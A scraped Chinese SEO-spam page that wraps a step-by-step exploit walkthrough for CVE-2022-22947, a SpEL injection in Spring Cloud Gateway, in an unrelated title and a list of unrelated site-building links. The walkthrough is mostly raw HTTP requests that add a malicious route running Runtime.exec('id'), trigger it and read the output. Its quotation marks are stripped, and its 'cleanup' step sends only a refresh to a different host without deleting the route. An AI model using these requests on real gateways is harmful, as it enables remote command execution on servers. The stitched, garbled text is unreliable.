当前位置: 首页 > news >正文

太原网站建设需求多嘛百度统计代码安装位置

news 2026/2/3 16:15:37
太原网站建设需求多嘛,百度统计代码安装位置,兰州网站建设,滨州网站seo服务Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本#xff08;包含#xff09;以前存在一处SpEL表达式注入漏洞#xff0c;当攻击者可以访问Actuator API的情况下#xff0c;将可以利用该漏洞执行任意命令。 参考链接#xff1a; https://tanzu.vmware.c…Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本包含以前存在一处SpEL表达式注入漏洞当攻击者可以访问Actuator API的情况下将可以利用该漏洞执行任意命令。 参考链接 https://tanzu.vmware.com/security/cve-2022-22947 https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans 1.首先发送如下数据包即可添加一个包含恶意SpEL表达式的路由 POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.188.128:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 329{id: hacktest,filters: [{name: AddResponseHeader,args: {name: Result,value: #{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\id\}).getInputStream()))}}}],uri: http://example.com } 然后发送如下数据包应用刚添加的路由。这个数据包将触发SpEL表达式的执行 POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.188.128:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0 发送如下数据包即可查看执行结果 GET /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.188.128:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0 最后发送如下数据包清理现场删除所添加的路由 POST /actuator/gateway/refresh HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0
http://www.dnsts.com.cn/news/173795.html

相关文章:

  • wap门户网站源码山东省住房建设厅网站安全处
  • 免费的网站模板下载长沙网站搭建
  • 大冶专业建站公司手机怎么自己做网页
  • 搭建网站钱网络建设和网站建设
  • 网站的优化策略方案怎样自己搭建一个做影视的网站
  • 网站建设公司测评安徽seo报价
  • 整站优化该怎么做最新军事新闻事件今天
  • 企业门户网站静态模板做公司网站价格
  • 武强网站建设常州找工作哪个网站好
  • 专做皮鞋销售网站东莞模板网站
  • 阿克苏网站建设价格淘宝是行业门户网站的盈利模式是什么
  • 甘肃平凉建设局网站网站建设销售客户开发
  • 网站分几种类型免费seo免费培训
  • 网站的投票 计数模块怎么做网站优化首页付款
  • 做网站需要会哪些知识wordpress 双栏主题
  • 网站建设投成都网站制作
  • 湛江网站建设技术托管极限优化wordpress
  • 做网站怎么挣钱最快企业网站开发北京
  • 自己电脑网站建设wordpress可以用火车头采集
  • 中文版wordpress东莞seo搜索
  • 从零开始网站建设国家企业信息系统查询系统
  • 网站建设招标网网站营销工作流程
  • 冠县做网站推广网站服务器数据库
  • 深圳傻瓜式网站建设公司好吗dede 购物网站
  • 临沧网站搭建兴义市建设局网站
  • 制作一个个人网站站长之家0
  • 校园微网站建设方案pptwordpress快站平台
  • 国之珍微站个人网站合肥万户网站建设
  • 做旅游网站的公司装饰设计公司官网
  • 织梦贷款网站源码宁波制作网站的公司